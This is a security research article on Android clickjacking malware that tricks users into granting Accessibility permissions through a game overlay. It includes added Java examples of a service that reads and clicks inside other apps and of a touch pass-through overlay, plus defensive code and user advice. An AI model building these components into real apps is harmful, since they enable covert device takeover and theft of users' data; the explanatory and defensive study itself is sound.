Inside the Android Accessibility clickjacking malware

Yair Amit, Co-founder and CTO, Skycure

Accessibility Services were added to Android to make devices running the mobile operating system easier to use for people with disabilities, but they can also give an attacker a way in. Without rooting a device, malware can exploit the legitimate functions of Accessibility Services and dodge the protections an Android device already has.

Ordinarily, data within mobile apps is protected by sandboxing, which prevents one app from accessing another's content. So the problem Skycure research manager Elisha Eshed and I posed for ourselves was how to circumvent sandboxing and access any information within apps used for business. We eventually focused on the Accessibility APIs in Android because they allow applications to see the content of other apps, as well as perform actions on them. That made Accessibility Services a perfect target for malware.
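To make concrete what "see the content of other apps, as well as perform actions on them" means, here is an added example of a minimal AccessibilityService. It is not Skycure's code. It assumes a manifest (not shown) that declares the service with android.permission.BIND_ACCESSIBILITY_SERVICE and an accessibility_service_config.xml with android:canRetrieveWindowContent="true"; the class name, package and log tag are placeholders.

```java
package com.example.a11ydemo;

import android.accessibilityservice.AccessibilityService;
import android.accessibilityservice.AccessibilityServiceInfo;
import android.util.Log;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;

import java.util.ArrayList;
import java.util.List;

// Added example, not Skycure's code. Once a user has switched this service on under
// Settings > Accessibility, Android feeds it events from every foreground app and
// lets it read and act on their view trees: this is the hole in the sandbox the
// article describes. Manifest assumptions (not shown): the <service> requires
// android.permission.BIND_ACCESSIBILITY_SERVICE and points at an
// accessibility_service_config.xml with android:canRetrieveWindowContent="true".
public class ScreenContentService extends AccessibilityService {
    private static final String TAG = "A11yDemo";   // placeholder tag

    @Override
    protected void onServiceConnected() {
        AccessibilityServiceInfo info = new AccessibilityServiceInfo();
        info.packageNames = null;   // null = events from all packages, not just our own
        info.eventTypes = AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED
                | AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED;
        info.feedbackType = AccessibilityServiceInfo.FEEDBACK_GENERIC;
        info.notificationTimeout = 100;
        setServiceInfo(info);
    }

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // Root of whatever app is currently in the foreground, not of this app.
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        List<String> texts = new ArrayList<>();
        collectText(root, texts);
        Log.d(TAG, event.getPackageName() + " displays: " + texts);
        root.recycle();
    }

    // Depth-first walk collecting every text node the foreground app exposes
    // (labels, message bodies, field contents).
    static void collectText(AccessibilityNodeInfo node, List<String> out) {
        CharSequence text = node.getText();
        if (text != null && text.length() > 0) out.add(text.toString());
        for (int i = 0; i < node.getChildCount(); i++) {
            AccessibilityNodeInfo child = node.getChild(i);
            if (child == null) continue;
            collectText(child, out);
            child.recycle();
        }
    }

    // Acting on the other app: find a control by its visible label and click it.
    // Returns whether a click was actually dispatched.
    boolean clickFirstNodeLabelled(String label) {
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return false;
        boolean clicked = false;
        for (AccessibilityNodeInfo node : root.findAccessibilityNodeInfosByText(label)) {
            if (!clicked && node.isClickable()) {
                clicked = node.performAction(AccessibilityNodeInfo.ACTION_CLICK);
            }
            node.recycle();
        }
        root.recycle();
        return clicked;
    }

    @Override
    public void onInterrupt() { }
}
```

Nothing here needs root or a vulnerability: every call is a documented part of the Accessibility API, which is exactly why the user-consent flow described next is the only barrier.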

However, the designers of Android are well aware that someone might try to exploit the Accessibility APIs for malevolent activity, so they made the process for an app to gain Accessibility permissions a bit tortuous. Five steps are needed to allow a malicious app to tap into Accessibility, and it's all capped off by a security warning. That makes duping a user to give a bad app permission to use Accessibility highly unlikely.

Clickjacking: It's back

We realized that if malware were to take advantage of Accessibility, it would have to do so without the user knowing it. One way we knew that could be done was through a technique called clickjacking. It works by overlaying one application on another application. The overlaying app appears benign to the user. However, as the user clicks on elements on that app, those clicks are actually propagated and processed by the underlying app. When the underlying app is part of the operating system, this can become a major security concern.

Clickjacking used to be a big problem on the web: malicious websites performed actions on legitimate websites without the victim's knowledge or consent using a variety of clickjacking techniques. It has appeared in the Android world, too. Just a month ago, Symantec discovered ransomware, which it named Android.Lockdroid.E, that uses clickjacking to obtain administrative rights on an Android device.

We used the clickjacking concept to get a victim to approve all the steps in giving our bad app permission to use Accessibility without knowing it. We created a whack-a-mole style game we called Rick and Morty. For experts, creating such a game isn't very challenging. Actually, getting the graphics in the game to look good was harder than making the app malicious.

Game on: Whack-a-mole game proves concept

Here's how the attack works. A player clicks on a Mr. Meeseeks moving on the screen. As that's done, what is happening in the background—without the player's knowledge or consent—is clicks are being passed to the permission choices for giving the malicious game use of the device's Accessibility Services.

Enabling our malicious game requires the user to grant it the SYSTEM_ALERT_WINDOW ("draw over other apps") permission, which allows one app to create a view over another app. This shouldn't raise suspicion, because some popular legitimate apps use the same permission and users are used to granting it. For example, Facebook Messenger's Chat Heads uses it so messages can be read and replied to while other apps are in use.

A variety of window types and flags specify a view's position and behavior. In our malicious game, we used TYPE_SYSTEM_OVERLAY to position the game view over everything on the screen and FLAG_NOT_FOCUSABLE so that touch events pass through to the Accessibility permissions dialog underneath the overlay.
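The window configuration just described, written out as an added example. This is not the game's own code: the class name is a placeholder, gameView stands for whatever the app draws, and the manifest is assumed to declare android.permission.SYSTEM_ALERT_WINDOW. It also includes the check that Marshmallow introduced for this permission, which the article's version table touches on below.

```java
import android.content.Context;
import android.graphics.PixelFormat;
import android.os.Build;
import android.provider.Settings;
import android.view.Gravity;
import android.view.View;
import android.view.WindowManager;

// Added example, not the game's own code. A full-screen window of type
// TYPE_SYSTEM_OVERLAY with FLAG_NOT_FOCUSABLE: the view is drawn above everything
// else while touches land in the window underneath it, which is the behaviour the
// article relies on. Manifest assumption (not shown):
// <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>.
public final class PassThroughOverlay {
    private PassThroughOverlay() { }

    public static WindowManager.LayoutParams buildParams() {
        WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
                WindowManager.LayoutParams.MATCH_PARENT,
                WindowManager.LayoutParams.MATCH_PARENT,
                WindowManager.LayoutParams.TYPE_SYSTEM_OVERLAY,
                // FLAG_NOT_FOCUSABLE also implies FLAG_NOT_TOUCH_MODAL, so touches
                // outside any focusable region are delivered to the windows below.
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE
                        | WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN,
                PixelFormat.TRANSLUCENT);   // transparent background, game drawn on top
        lp.gravity = Gravity.TOP | Gravity.START;
        return lp;
    }

    // Returns false if the overlay could not be shown. From Marshmallow (API 23) on,
    // SYSTEM_ALERT_WINDOW is no longer granted at install time: the user has to
    // approve it in Settings, and Settings.canDrawOverlays reports whether they did.
    public static boolean show(Context ctx, View gameView) {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M
                && !Settings.canDrawOverlays(ctx)) {
            return false;
        }
        WindowManager wm = (WindowManager) ctx.getSystemService(Context.WINDOW_SERVICE);
        wm.addView(gameView, buildParams());
        return true;
    }
}
```

The security-relevant observation is how little is involved: a single permission that many legitimate apps request, and two documented WindowManager constants. Nothing about the overlay itself tells the OS that the window below is a security dialog.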

Once the game is plugged into Accessibility capabilities, it will be able to do pretty much anything the owner of the phone can do. It can perform banking functions, write and read emails, and create and read documents. Whatever an owner does, the attacker can see done and do on behalf of the user without their knowledge. Depending on the attacker's disposition, malicious tasks can be performed automatically or by remote access to the device.

We found that our clickjacking app worked on every version of Android except the two most recent releases: Lollipop (5.0 and 5.1) and Marshmallow (6.0). In Lollipop, adjustments were made to the operating system to thwart clickjackers; we are currently looking into these mitigations. However, since those versions account for a little over 35% of Android devices in use, the attack would still be effective against nearly two-thirds of all Android devices, a staggering 500 million.

How to block the attack

Users can take a number of measures to reduce the risk of being exploited by a clickjacking attack. If possible, they should upgrade to the latest version of Android, which, as noted above, contains better protections against clickjacking. It's also wise not to tap dialog boxes that pop up on the screen unless you are certain what caused them to appear. Sticking to Google Play for app downloads also lowers the risk of bad apps landing on a device. Although it's not always realistic to avoid third-party stores, steering clear of them lowers risk, since most infected software for Android comes from such outlets.

Another way to thwart attacks on your device is to install a mobile threat defense app. In the desktop and laptop computer world, most users don't think twice about installing antivirus and anti-malware software on their systems, but in the mobile world, the practice is yet to become commonplace. That, though, may change soon.
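The advice above is aimed at users. Developers of apps with sensitive controls (an "Allow", "Pay" or "Send" button) have a framework-level check of their own, shown here as an added example that is not part of the original article. The class name and log tag are placeholders; the APIs are View.setFilterTouchesWhenObscured, View.onFilterTouchEventForSecurity and MotionEvent.FLAG_WINDOW_IS_OBSCURED, all available since API 9.

```java
import android.content.Context;
import android.util.AttributeSet;
import android.util.Log;
import android.view.MotionEvent;
import android.widget.Button;

// Added example, not from the article. A button that refuses touches delivered while
// another window is drawn over it. Android marks such events with
// MotionEvent.FLAG_WINDOW_IS_OBSCURED; setFilterTouchesWhenObscured(true) makes the
// framework discard them before onTouchEvent, and overriding
// onFilterTouchEventForSecurity lets the view notice and count the attempt.
public class ObscuredAwareButton extends Button {
    private static final String TAG = "TapjackGuard";   // placeholder tag
    private int droppedTouches;

    public ObscuredAwareButton(Context ctx) {
        this(ctx, null);
    }

    public ObscuredAwareButton(Context ctx, AttributeSet attrs) {
        super(ctx, attrs);
        // Same effect as android:filterTouchesWhenObscured="true" in the layout XML.
        setFilterTouchesWhenObscured(true);
    }

    @Override
    public boolean onFilterTouchEventForSecurity(MotionEvent event) {
        if ((event.getFlags() & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0) {
            droppedTouches++;
            Log.w(TAG, "Dropped touch: another window is drawn over this view");
            return false;   // event is not dispatched to onTouchEvent
        }
        return super.onFilterTouchEventForSecurity(event);
    }

    // Exposed so the app can, for example, warn the user after repeated attempts.
    public int getDroppedTouches() {
        return droppedTouches;
    }
}
```

Two caveats. First, this protects an app's own controls; the Accessibility permission dialog attacked in this article is system UI, so only the platform can apply the check there, which is what the Lollipop-era changes mentioned above addressed. Second, FLAG_WINDOW_IS_OBSCURED is set when the touch point itself is covered; Android 10 (API 29) added MotionEvent.FLAG_WINDOW_IS_PARTIALLY_OBSCURED for the case where an overlay covers only part of the window, and a defensive view may want to treat that case the same way.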

Gamification delivers new era of attacks

In the past, mobile malware has been more of an inconvenience than a dangerous threat. Malicious apps might pop up unwanted advertising on a phone or send a few SMS messages that resulted in unauthorized charges on a phone bill. These attacks weren't pleasant, but they weren't terrible. The kind of attack we created, one that can take over command of an Android device, moves the needle from something that is annoying to something that is scary: something that can be used to steal sensitive information, both personal and business, from a device.

This attack is the next step in the evolution of malware, and it's a step where the enterprise has a lot to lose.